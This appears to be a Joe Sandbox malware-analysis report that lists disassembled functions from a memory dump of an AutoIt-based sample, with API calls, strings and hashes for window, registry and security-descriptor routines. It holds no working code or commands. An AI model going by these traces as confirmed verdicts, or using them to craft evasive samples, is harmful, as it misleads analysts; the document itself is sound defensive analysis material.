Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a0a3cc2b4c8813af16274c62e3232a71f7df00047e2a6a607370e354c5f9e36e
Instruction ID: 07ca9c1d77ae6e6e0f22d8c9668cb05324f001bec088f1f6b3cefeb676b741b3
Opcode Fuzzy Hash: a0a3cc2b4c8813af16274c62e3232a71f7df00047e2a6a607370e354c5f9e36e
Instruction Fuzzy Hash:

Function 00EB353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EB358D
DeleteObject.GDI32(00000000), ref: 00EB35A0
DestroyWindow.USER32 ref: 00EB35AF
GetDesktopWindow.USER32 ref: 00EB35CA
GetWindowRect.USER32(00000000), ref: 00EB35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EB3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EB370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3755
GetClientRect.USER32(00000000,?), ref: 00EB3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EB379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37DD
GlobalLock.KERNEL32(00000000), ref: 00EB37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB37F5
GlobalUnlock.KERNEL32(00000000), ref: 00EB37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3805
GlobalFree.KERNEL32(00000000), ref: 00EB3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED0C04,00000000), ref: 00EB3838
GlobalFree.KERNEL32(00000000), ref: 00EB3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EB386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EB388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB3A9C

Strings

AutoIt v3, xrefs: 00EB374F
static, xrefs: 00EB3797, 00EB38EE
DISPLAY, xrefs: 00EB38FF
, xrefs: 00EB3A22

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b47377fbf956fbf5e9cec24664203740724561c84432b6a20cb42ccac748b81a
Instruction ID: f53f5a312be677d25b0018a28045f6de63b93f277f9de528bc7549af78819c92
Opcode Fuzzy Hash: b47377fbf956fbf5e9cec24664203740724561c84432b6a20cb42ccac748b81a
Instruction Fuzzy Hash: BF026E71900209AFDB14DF65CD89EAE7BB9FB48310F148168F915BB2A0DB76ED05CB60

Function 00E31625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00E316B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E72B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E72B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E72F85

Part of subcall function 00E31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E31488,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E31865

SendMessageW.USER32(?,00001053), ref: 00E72FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E72FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E72FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E72FF9

Strings

0, xrefs: 00E72E11

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 13542f77ebdc2fcd8e261ebdfd626486741fc637e1e21611ee22a11f3e548962
Instruction ID: 63070f9cecc8574317a26f41c83871b1150af1ee81944d3771f66c5ee88b6aa1
Opcode Fuzzy Hash: 13542f77ebdc2fcd8e261ebdfd626486741fc637e1e21611ee22a11f3e548962
Instruction Fuzzy Hash: DE12A130604241DFCB25CF15C849BA9BBE1FB44304F18A56DF699BB261C732EC86EB91

Function 00EB316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00EB319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EB3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EB3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EB335D
GetClientRect.USER32(00000000,?), ref: 00EB3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EB33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB33C1
GetStockObject.GDI32(00000011), ref: 00EB33D1
SelectObject.GDI32(00000000,00000000), ref: 00EB33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EB33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB33EE
DeleteDC.GDI32(00000000), ref: 00EB33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EB347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EB34D4
GetStockObject.GDI32(00000011), ref: 00EB34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EB34F4

Strings

AutoIt v3, xrefs: 00EB3355
static, xrefs: 00EB33AC, 00EB34CE
DISPLAY, xrefs: 00EB33B7
msctls_progress32, xrefs: 00EB3470

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e26d839efd86f73be1b293282b381e8ed7ab47324afb07ee77db021a996c90e9
Instruction ID: 1a862b5b3914204e1aed92f6fc96d316c57e89d16e1d1a4ded870148f738afd9
Opcode Fuzzy Hash: e26d839efd86f73be1b293282b381e8ed7ab47324afb07ee77db021a996c90e9
Instruction Fuzzy Hash: 42B14F71A00209AFEB14DFA9CD4AFAEBBB9FB44710F104115F915E7290D775AD01CB60

Function 00EA5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EA5532
GetDriveTypeW.KERNEL32(?,00ECDC30,?,\\.\,00ECDCD0), ref: 00EA560F
SetErrorMode.KERNEL32(00000000,00ECDC30,?,\\.\,00ECDCD0), ref: 00EA577B

Strings

Fixed, xrefs: 00EA564E
SSD, xrefs: 00EA568F
USB, xrefs: 00EA56F9
Fibre, xrefs: 00EA56F2
Virtual, xrefs: 00EA572A
SSA, xrefs: 00EA56EB
PhysicalDrive, xrefs: 00EA55BB
FileBackedVirtual, xrefs: 00EA5731
SATA, xrefs: 00EA5715
ATA, xrefs: 00EA56DD
RAID, xrefs: 00EA5700
Network, xrefs: 00EA5647
Unknown, xrefs: 00EA5632, 00EA56C8
CDROM, xrefs: 00EA5640
iSCSI, xrefs: 00EA5707
ATAPI, xrefs: 00EA56D6
Removable, xrefs: 00EA5655, 00EA565A
SCSI, xrefs: 00EA56CF
SAS, xrefs: 00EA570E
\\.\, xrefs: 00EA5584
MMC, xrefs: 00EA5723
1394, xrefs: 00EA56E4
RAMDisk, xrefs: 00EA5639

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d576a599e2ccce24bf394e7f387ff85c9bce863f2201f734e034b12343ebb113
Instruction ID: 217bbe65c4a34fcaeb5b9c13b9499abd86c0a034eb93cb14a89f009df6f20e20
Opcode Fuzzy Hash: d576a599e2ccce24bf394e7f387ff85c9bce863f2201f734e034b12343ebb113
Instruction Fuzzy Hash: CF61E132A08A09DBC724DF24C992DB8B7B1AF5A364B64B056F446BF291C732FD01CB41

Function 00EC1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EC1BC4
GetDesktopWindow.USER32 ref: 00EC1BD9
GetWindowRect.USER32(00000000), ref: 00EC1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00EC1C35
DestroyWindow.USER32(?), ref: 00EC1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00EC1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EC1CE1
IsWindowVisible.USER32(00000000), ref: 00EC1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EC1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EC1D6C
GetWindowRect.USER32(00000000,?), ref: 00EC1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00EC1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00EC1DC4
CopyRect.USER32(?,?), ref: 00EC1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00EC1E46

Strings

tooltips_class32, xrefs: 00EC1C82
0, xrefs: 00EC1B6F
(, xrefs: 00EC1DB7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3f800943dbe2d7b5688b217dd5706ef1609a5c4280c78546dbca3caa7e181428
Instruction ID: 0461eed6514ad35d94541e61e5d1fee1c8291c8d215eaa5def72c482764bc2a2
Opcode Fuzzy Hash: 3f800943dbe2d7b5688b217dd5706ef1609a5c4280c78546dbca3caa7e181428
Instruction Fuzzy Hash: 0BB19C71608301AFD714DF65C984F6AFBE5EF85314F00995CF999AB292C732E806CB92

Function 00EC0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EC0D81
_wcslen.LIBCMT ref: 00EC0DBB
_wcslen.LIBCMT ref: 00EC0E25
_wcslen.LIBCMT ref: 00EC0E8D
_wcslen.LIBCMT ref: 00EC0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC0FA0

Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D

Part of subcall function 00E92B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E92BA5
Part of subcall function 00E92B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E92BD7

Strings

SELECTCLEAR, xrefs: 00EC0FC9
FINDITEM, xrefs: 00EC10C3
SELECTINVERT, xrefs: 00EC101A
GETITEMCOUNT, xrefs: 00EC0DB2, 00EC0DD3
SELECT, xrefs: 00EC0FE4
SELECTALL, xrefs: 00EC0FB1
ISSELECTED, xrefs: 00EC0F79
DESELECT, xrefs: 00EC1038
GETTEXT, xrefs: 00EC0E88, 00EC0EA3
VIEWCHANGE, xrefs: 00EC1111
GETSUBITEMCOUNT, xrefs: 00EC0E20, 00EC0E3B
GETSELECTEDCOUNT, xrefs: 00EC0F0C, 00EC0F27
GETSELECTED, xrefs: 00EC107D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: b38cad0e8b5a1df2668782f12e1988804cc71e07f29aaf4631b722115e4af129
Instruction ID: 5e826012df8e72db52df1808d890c6f9511493400ea4436d720583ecac960fa4
Opcode Fuzzy Hash: b38cad0e8b5a1df2668782f12e1988804cc71e07f29aaf4631b722115e4af129
Instruction Fuzzy Hash: 8AE18D312043418FCB14DF24CA51A7AB7E5BF85318B14696CF496B73A2DB32ED46CB91

Function 00E32521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E325F8
GetSystemMetrics.USER32(00000007), ref: 00E32600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E3262B
GetSystemMetrics.USER32(00000008), ref: 00E32633
GetSystemMetrics.USER32(00000004), ref: 00E32658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E32675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E32685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E326B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E326CC
GetClientRect.USER32(00000000,000000FF), ref: 00E326EA
GetStockObject.GDI32(00000011), ref: 00E32706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E32711

Part of subcall function 00E319CD: GetCursorPos.USER32(?), ref: 00E319E1
Part of subcall function 00E319CD: ScreenToClient.USER32(00000000,?), ref: 00E319FE
Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000001), ref: 00E31A23
Part of subcall function 00E319CD: GetAsyncKeyState.USER32(00000002), ref: 00E31A3D

SetTimer.USER32(00000000,00000000,00000028,00E3199C), ref: 00E32738

Strings

AutoIt v3 GUI, xrefs: 00E326B0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d1af0098ee90e6eb942516a35b99f77f3e2e40a47b0b11f55ed1abc9f5964b66
Instruction ID: f6ccdf5ccd41c8227556506d1d4af08fea68e4976ebf8d8a5fd07f07fc40449a
Opcode Fuzzy Hash: d1af0098ee90e6eb942516a35b99f77f3e2e40a47b0b11f55ed1abc9f5964b66
Instruction Fuzzy Hash: E9B18D31A002099FDB54DFA8CC89FAE7BB5FB88314F109129FA49B7290D771E941DB51

Function 00E916D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
Part of subcall function 00E91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
Part of subcall function 00E91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
Part of subcall function 00E91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E91741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E91775
GetLengthSid.ADVAPI32(?), ref: 00E9178C
GetAce.ADVAPI32(?,00000000,?), ref: 00E917C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E917E2
GetLengthSid.ADVAPI32(?), ref: 00E917F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E91801
HeapAlloc.KERNEL32(00000000), ref: 00E91808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E91829
CopySid.ADVAPI32(00000000), ref: 00E91830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E9185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E91881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E91893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918BA
HeapFree.KERNEL32(00000000), ref: 00E918C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918CA
HeapFree.KERNEL32(00000000), ref: 00E918D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E918DA
HeapFree.KERNEL32(00000000), ref: 00E918E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00E918ED
HeapFree.KERNEL32(00000000), ref: 00E918F4

Part of subcall function 00E91ADF: GetProcessHeap.KERNEL32(00000008,00E914FD,?,00000000,?,00E914FD,?), ref: 00E91AED
Part of subcall function 00E91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E914FD,?), ref: 00E91AF4
Part of subcall function 00E91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E914FD,?), ref: 00E91B03

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8f04cbb684e36fe528bb32c084838bcf4b496b1ded33b58d78bc22523c72eccd
Instruction ID: e7dadf0c49b390f3b9fe5a1423a9c1ce8323fe82549570f5138415561e33f42d
Opcode Fuzzy Hash: 8f04cbb684e36fe528bb32c084838bcf4b496b1ded33b58d78bc22523c72eccd
Instruction Fuzzy Hash: AD7149B2D0420ABFDF20DFA6DC45FAEBBB9BF04314F144165E915B6290D7729A06CB60

Function 00EBCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBCF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00ECDCD0,00000000,?,00000000,?,?), ref: 00EBCFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EBD004
_wcslen.LIBCMT ref: 00EBD054
_wcslen.LIBCMT ref: 00EBD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EBD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EBD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EBD2AD
RegCloseKey.ADVAPI32(?), ref: 00EBD2E1
RegCloseKey.ADVAPI32(00000000), ref: 00EBD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EBD3C0

Strings

REG_EXPAND_SZ, xrefs: 00EBD02D
REG_QWORD, xrefs: 00EBD323
REG_SZ, xrefs: 00EBD0A4
REG_MULTI_SZ, xrefs: 00EBD155
REG_BINARY, xrefs: 00EBD373
REG_DWORD, xrefs: 00EBD264

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 3d411e2f37c772352b6a5fd9ca0d240762b9ef97de424c637303a32e18ff2af3
Instruction ID: 12b6eae7d7737962685d489f95edfea04fa0d7a6dc34e8dc20f3bf5896865974
Opcode Fuzzy Hash: 3d411e2f37c772352b6a5fd9ca0d240762b9ef97de424c637303a32e18ff2af3
Instruction Fuzzy Hash: 401259756082019FC714DF14C985A6ABBF5EF88714F14989CF98AAB3A2DB31FD41CB81

Function 00EC13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EC1462
_wcslen.LIBCMT ref: 00EC149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC14F0
_wcslen.LIBCMT ref: 00EC1526
_wcslen.LIBCMT ref: 00EC15A2
_wcslen.LIBCMT ref: 00EC161D

Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D

Part of subcall function 00E93535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E93547

Strings

EXPAND, xrefs: 00EC1694
ISCHECKED, xrefs: 00EC177D
SELECT, xrefs: 00EC17AD
GETITEMCOUNT, xrefs: 00EC16BA
CHECK, xrefs: 00EC1521, 00EC153C
